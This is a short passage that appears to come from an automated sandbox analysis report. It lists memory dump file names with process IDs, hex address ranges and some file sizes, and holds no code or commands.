memory/1728-83-0x0000000000000000-mapping.dmp
-
memory/1732-98-0x0000000000000000-mapping.dmp
-
memory/1780-69-0x0000000000000000-mapping.dmp
-
memory/1788-54-0x0000000075AE1000-0x0000000075AE3000-memory.dmpFilesize
8KB
-
memory/1788-62-0x0000000000400000-0x0000000002054000-memory.dmpFilesize
28.3MB
-
memory/1800-112-0x0000000000000000-mapping.dmp
-
memory/1808-139-0x0000000000000000-mapping.dmp
-
memory/1868-122-0x0000000000000000-mapping.dmp
-
memory/1940-94-0x0000000000000000-mapping.dmp
-
memory/1944-129-0x0000000000000000-mapping.dmp
-
memory/1956-102-0x0000000000000000-mapping.dmp
-
memory/1960-126-0x0000000000000000-mapping.dmp
-
memory/2076-146-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/2076-144-0x0000000000000000-mapping.dmp
-
memory/2124-149-0x0000000000000000-mapping.dmp
-
memory/2160-154-0x0000000000000000-mapping.dmp